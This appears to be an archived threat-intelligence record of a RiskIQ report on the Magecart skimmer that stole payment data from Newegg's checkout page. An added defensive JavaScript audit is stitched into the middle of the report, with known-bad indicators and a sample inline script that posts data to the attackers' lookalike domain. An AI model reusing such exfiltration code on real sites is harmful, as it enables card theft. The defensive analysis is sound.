{
	"id": "d04dcc8c-05ae-4c09-85c7-28bfc5b4ae60",
	"created_at": "2026-04-06T00:10:07.207555Z",
	"updated_at": "2026-04-10T03:24:11.827512Z",
	"deleted_at": null,
	"sha1_hash": "3e58e6bdc409d0498c76749dbdc044772063afdb",
	"title": "Another Victim of the Magecart Assault Emerges: Newegg",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 123196,
	"plain_text": "Another Victim of the Magecart Assault Emerges: Newegg\r\nPublished: 2018-09-19 · Archived: 2026-04-05 18:35:58 UTC\r\nSeptember 19, 2018, Yonathan Klijnsma\r\nRiskIQ conducted the research for this report in collaboration with Volexity, which will release a separate report\r\nof its own. From different perspectives, we will discuss the same incident, showing how we found and analyzed the\r\nlatest instance of Magecart using our unique capabilities and datasets.\r\nWhile the dust is settling on the British Airways compromise, the Magecart actor behind it has not stopped their\r\nwork, hitting yet another large merchant: Newegg.\r\nLast week we published details on the British Airways compromise immediately after the company made its first\r\nadvisory public linking the breach of customer credit card information to Magecart. We were able to disclose these\r\ndetails based on our years of tracking the activities and infrastructure of the umbrella of Magecart groups\r\nperforming digital credit card skimming campaigns. The British Airways attack was highly targeted and done via a\r\ntactic we’d seen evolving through the years.\r\nThe report on the British Airways attack came shortly after our discovery that Magecart was also behind the\r\nbreach of Ticketmaster. As we built the narrative, it’s becoming clear to the industry that these simple yet clever\r\nattacks are not only devastating, they’re becoming more and more prevalent. Newegg is just the latest victim.\r\nThe breach of Newegg shows the true extent of Magecart operators’ reach. These attacks are not confined to\r\ncertain geolocations or specific industries—any organization that processes payments online is a target. 
The\r\nelements of the British Airways attack were all present in the attack on Newegg: the operators integrated with the victim’s\r\npayment system and blended with its infrastructure, staying there as long as possible.\r\nAnother Well-Disguised Attack\r\nOn August 13th Magecart operators registered a domain called neweggstats.com with the intent of blending in\r\nwith Newegg’s primary domain, newegg.com. Registered through Namecheap, the malicious domain initially\r\npointed to a standard parking host. However, the actors changed it to 217.23.4.11 a day later, a Magecart drop\r\nserver where their skimmer backend runs to receive skimmed credit card information. Similar to the British\r\nAirways attack, these actors acquired a certificate issued for the domain by Comodo to lend an air of legitimacy to\r\ntheir page:\r\nhttps://web.archive.org/web/20181209083100/https://www.riskiq.com/blog/labs/magecart-newegg/\r\nPage 1 of 3\r\nFig-1 Cert used in the attack\r\nSource: https://community.riskiq.com/search/certificate/sha1/df86a5cb482bb884d2bd06d8660b279a446c2d02\r\nAt this point, the server was ready for an attack against the customers of newegg.com. Around August\r\n14th, the attackers placed the skimmer code on Newegg, integrating it into the checkout process and\r\ndisguising it well.\r\nWhen a customer wants to buy a product they have to go through the following steps:\r\n1. Put a product in their shopping cart\r\n2. Go to the first step of the check-out, entering their delivery information\r\n3. When their address is validated, the customer is taken to the next page: payment processing, where they\r\nenter their credit card information.\r\nThe skimmer was embedded in the payment processing page itself rather than in a separately loaded script file, so it would not appear unless the\r\npayment page was hit. 
Hitting that page means a customer had already gone through the first two steps: they could not reach the\r\npayment page without putting something in a cart and entering a validated address.\r\nThe URL for the page that would return the skimmer was:\r\nhttps://secure.newegg.com/GlobalShopping/CheckoutStep2.aspx\r\nIntegrating with this process hid the skimmer and\r\nmight help explain how it stayed on the Newegg website for more than a month.\r\nThe skimmer code is recognizable from the British Airways incident and is built on the same base code. All the attackers\r\nchanged is the name of the form it needs to serialize to obtain payment information and the server to send it to,\r\nthis time themed with Newegg instead of British Airways. In the case of Newegg, the skimmer was smaller\r\nbecause it only had to serialize one form and therefore condensed down to a tidy 15 lines of script:\r\nFig-2 15 lines of script, smaller than the British Airways attack\r\nThe skimmer first became active around August 14th, and we confirmed it was removed\r\non September 18th, which means the attackers had a full month of skimming Newegg customers. Conveniently\r\nfor the attackers, the skimmer, just like in the British Airways attack, works for both desktop and mobile\r\ncustomers.\r\nWith the size of the business evaluated at $2.65 billion in 2016, Newegg is an extremely popular retailer. Alexa\r\nranks Newegg as the 161st most popular site in the U.S., and Similarweb, which also gathers information on\r\nsite visits, estimates Newegg receives over 50 million visitors a month. Over an entire month of skimming, we can\r\nassume this attack claimed a massive number of victims.\r\nConclusions\r\nMagecart attacks are surging: RiskIQ’s automated detections of Magecart breaches ping us almost\r\nhourly. 
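The report’s point is that the skimmer lived inline in the payment page and differed from the British Airways one only in the form it serialized and the host it posted to. The following is an added example for this page, not code from RiskIQ, Newegg or the attackers: a merchant-side check that pulls every inline script out of a checkout page, collects the hosts those scripts reference, and flags any host that is not first-party, with the report’s drop domain and drop server treated as known-bad indicators. The FIRST_PARTY list, the sample pages and the placeholder inline script that stands in for the skimmer are all constructed for this example; the real skimmer appears in the report only as an image.

```javascript
// Added example for this corpus page, not code from RiskIQ, Newegg or the attackers.
// It sketches the check a merchant could run against its own checkout page: pull
// every inline <script> out of the page HTML, collect the hosts those scripts
// reference, and flag any host that is not first-party. A skimmer that posts a
// serialized payment form to a lookalike drop domain shows up as an external host.
// Written without regular expressions or double quotes so it sits cleanly inside
// this JSON record.

// First-party domains the checkout page may talk to (assumption for this example).
const FIRST_PARTY = ['newegg.com'];

// Attacker infrastructure named in the report: the drop domain and the drop server.
const KNOWN_BAD = ['neweggstats.com', '217.23.4.11'];

// Characters allowed inside a URL; scanning stops at the first other character.
const URL_CHARS = 'abcdefghijklmnopqrstuvwxyz0123456789-._~:/?#@!$&*+,;=%';

// Return the body of every inline <script> element (script tags without a src).
function inlineScripts(html) {
  const out = [];
  const lower = html.toLowerCase();
  let pos = 0;
  for (;;) {
    const open = lower.indexOf('<script', pos);
    if (open < 0) break;
    const tagEnd = lower.indexOf('>', open);
    const close = lower.indexOf('</script>', tagEnd);
    if (tagEnd < 0 || close < 0) break;
    const attrs = lower.slice(open + 7, tagEnd);
    // Scripts loaded by src are the third-party vector; this check is about inline code.
    if (attrs.indexOf('src') < 0) out.push(html.slice(tagEnd + 1, close));
    pos = close + 9;
  }
  return out;
}

// Extract the hostnames of absolute http(s) URLs referenced in a script body.
function hostsIn(script) {
  const hosts = new Set();
  const lower = script.toLowerCase();
  for (const scheme of ['http://', 'https://']) {
    let pos = 0;
    for (;;) {
      const start = lower.indexOf(scheme, pos);
      if (start < 0) break;
      let end = start + scheme.length;
      while (end < lower.length && URL_CHARS.indexOf(lower[end]) >= 0) end++;
      try {
        hosts.add(new URL(script.slice(start, end)).hostname);
      } catch (e) {
        // Not a parseable URL (for example a bare scheme inside a string); ignore it.
      }
      pos = end;
    }
  }
  return [...hosts];
}

function isFirstParty(host) {
  return FIRST_PARTY.some((d) => host === d || host.endsWith('.' + d));
}

// Audit a page: hosts referenced from inline scripts that are not first-party,
// plus the subset matching known attacker infrastructure. Both lists are sorted.
function auditCheckoutPage(html) {
  const external = new Set();
  const knownBad = new Set();
  for (const body of inlineScripts(html)) {
    for (const host of hostsIn(body)) {
      if (isFirstParty(host)) continue;
      external.add(host);
      if (KNOWN_BAD.includes(host)) knownBad.add(host);
    }
  }
  return { external: [...external].sort(), knownBad: [...knownBad].sort() };
}

// Constructed sample checkout page. The inline block is a placeholder standing in
// for a skimmer that posts to the lookalike domain from the report; it is not the
// actual skimmer code.
const SAMPLE_CHECKOUT_HTML = `
<html><body>
<form id='checkoutForm'>...</form>
<script src='https://secure.newegg.com/js/checkout.js'></script>
<script>
  window.addEventListener('load', function () {
    var payload = 'constructed=1';
    fetch('https://neweggstats.com/', { method: 'POST', body: payload });
  });
</script>
</body></html>`;

// Constructed clean page: its only inline script talks to a first-party host.
const SAMPLE_CLEAN_HTML = `
<html><body>
<script>fetch('https://images.newegg.com/ping');</script>
</body></html>`;

// Stand-alone run: prints the audit of the constructed sample page.
console.log(auditCheckoutPage(SAMPLE_CHECKOUT_HTML));
```

Run periodically against the live payment page (the report names CheckoutStep2.aspx as the one that returned the skimmer), after completing the cart and address steps so the page actually loads, and alert on any new host in the external list; a second list built from script src attributes covers the third-party vector seen in the Ticketmaster case.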
Meanwhile, we’re seeing attackers evolve and improve over time, setting their sights on breaches of large\r\nbrands. While some Magecart groups still target smaller shops, the subgroup responsible for the attacks against\r\nNewegg and British Airways is particularly audacious, performing cunning, highly targeted attacks with skimmers\r\nthat seamlessly integrate into their targets’ websites.\r\nThe attack on Newegg shows that while third-party scripts have been a problem for websites, as in the case of the\r\nTicketmaster breach, attackers also compromise self-hosted code, which lets them move and evolve: in this case they changed the actual payment\r\nprocessing page to place their skimmer.\r\nWe urge banks to reissue cards, or add OTP protection, for cards they can correlate with\r\ntransactions that occurred on Newegg between August 14th and September 18th.\r\nSource: https://web.archive.org/web/20181209083100/https://www.riskiq.com/blog/labs/magecart-newegg/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://web.archive.org/web/20181209083100/https://www.riskiq.com/blog/labs/magecart-newegg/"
	],
	"report_names": [
		"magecart-newegg"
	],
	"threat_actors": [
		{
			"id": "5a0483f5-09b3-4673-bb5a-56d41eaf91ed",
			"created_at": "2023-01-06T13:46:38.814104Z",
			"updated_at": "2026-04-10T02:00:03.110104Z",
			"deleted_at": null,
			"main_name": "MageCart",
			"aliases": [],
			"source_name": "MISPGALAXY:MageCart",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434207,
	"ts_updated_at": 1775791451,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3e58e6bdc409d0498c76749dbdc044772063afdb.pdf",
		"text": "https://archive.orkl.eu/3e58e6bdc409d0498c76749dbdc044772063afdb.txt",
		"img": "https://archive.orkl.eu/3e58e6bdc409d0498c76749dbdc044772063afdb.jpg"
	}
}